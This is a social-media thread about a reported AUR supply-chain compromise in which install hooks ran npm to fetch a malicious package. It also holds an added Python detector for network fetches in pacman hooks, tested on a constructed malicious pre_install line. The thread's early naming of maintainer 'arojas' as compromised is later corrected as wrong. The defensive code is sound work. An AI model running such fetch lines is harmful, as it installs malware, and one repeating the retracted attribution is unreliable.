400+ Arch User Repository packages have been compromised in a massive, sophisticated supply chain attack, including a rootkit installation.

https://discourse.ifin.network/t/400-aur-packages-compromised-with-infostealer-and-rootkit/577

#ThreatIntel #ThreatIntelligence #IFIN

400+ AUR Packages Compromised with Infostealer and Rootkit

Last Updated: 2026-06-12T04:22:42Z (UTC)

What’s Happening

It appears an AUR package maintainer’s account (arojas) was compromised. The maintainer’s account had write access to over 400 package repos. The compromise was reported and other AUR maintainers have been working to remove the infected packages. The affected packages were modified with preinstall scripts to use npm to install the atomic-lockfile package, a malicious payload. Here’s an example of the change: This blog has a deep d...

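The linked write-up describes packages whose install scriptlets were changed to run npm at install time. A defender triaging a mirror of affected PKGBUILDs could flag that pattern automatically; the checker below is an added example, not code from IFIN or the Arch project, and the `.install` scriptlet it scans is a constructed sample modelled on that description (the hook and command names are real pacman/npm conventions, the payload line is made up).

```python
"""Flag pacman .install / PKGBUILD hooks that fetch code from the network."""
import re
from typing import List, Tuple

# An install hook has no legitimate reason to pull code from a registry or URL.
NETWORK_FETCH = re.compile(r"\b(npm\s+(?:install|i|exec)|npx|pip\s+install|curl|wget)\b")
# pacman .install hook names plus the PKGBUILD build-phase functions.
HOOK_START = re.compile(
    r"^\s*(pre_install|post_install|pre_upgrade|post_upgrade|prepare|build|package)\s*\(\)\s*\{"
)


def find_fetches(script: str) -> List[Tuple[str, int, str]]:
    """Return (hook_name, line_no, stripped_line) for each fetching line inside a hook body.

    Brace depth is tracked per line, which is enough for the flat shell functions
    these scriptlets normally contain.
    """
    findings: List[Tuple[str, int, str]] = []
    current = None
    depth = 0
    for lineno, line in enumerate(script.splitlines(), 1):
        m = HOOK_START.match(line)
        if m and depth == 0:
            current, depth = m.group(1), 1
            continue
        if current is None:
            continue
        depth += line.count("{") - line.count("}")
        code_only = line.split("#", 1)[0]  # ignore trailing shell comments
        if NETWORK_FETCH.search(code_only):
            findings.append((current, lineno, line.strip()))
        if depth <= 0:
            current, depth = None, 0
    return findings


# Constructed sample: a benign post_install plus a pre_install of the kind described above.
SAMPLE_INSTALL = """\
# constructed .install scriptlet for demonstration
post_install() {
  echo "installed"
}
pre_install() {
  npm install -g atomic-lockfile >/dev/null 2>&1 || true
}
"""

if __name__ == "__main__":
    for hook, lineno, text in find_fetches(SAMPLE_INSTALL):
        print(f"{hook}() line {lineno}: {text}")
```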
@ifin yay was being weird about gpg keys last time I went to update my arch box and I just updated pacman stuff instead. Good day to be lazy I guess

@ifin @mttaggart The attack was orchestrated by bot accounts and automated scripts, including the impersonation of the git identity of the last committer as an obfuscation method. "arojas" is a trusted Arch Linux developer and he's *not* behind these attacks; his git identity just got impersonated in the process, like that of a lot of other people.

Could you please remove the wrong and misleading mention of the "arojas" username as being the author behind these attacks?
Thanks! 🙏

@Antiz @mttaggart Done. Thank you for the clarification.
@ifin @mttaggart You're welcome, thanks for your quick actions! 🤗
@ifin @Antiz @mttaggart what *credible* publications do when they're caught spreading slander due to sloppy research is to publish a retraction owning up to their mistake, rather than silently editing it out.
@lambda @Antiz @mttaggart Thanks for the feedback! Our changes are visible to the public, unlike news publications. But to address your concern, we've added a note addressing the inaccuracy.
@ifin Presumably, it's related to the numerous sustained DDoS attacks on the AUR.
@ifin AUR is not guarded by proper signatures?
@waldi anyone can sign up for an account and adopt orphaned packages, then push updated PKGBUILDs
@ifin Nothing sophisticated, really.
@rgacogne The use of an eBPF rootkit is beyond most supply chain attacks we see.
@ifin „sophisticated“ as in „Trust me bro I will maintain your package“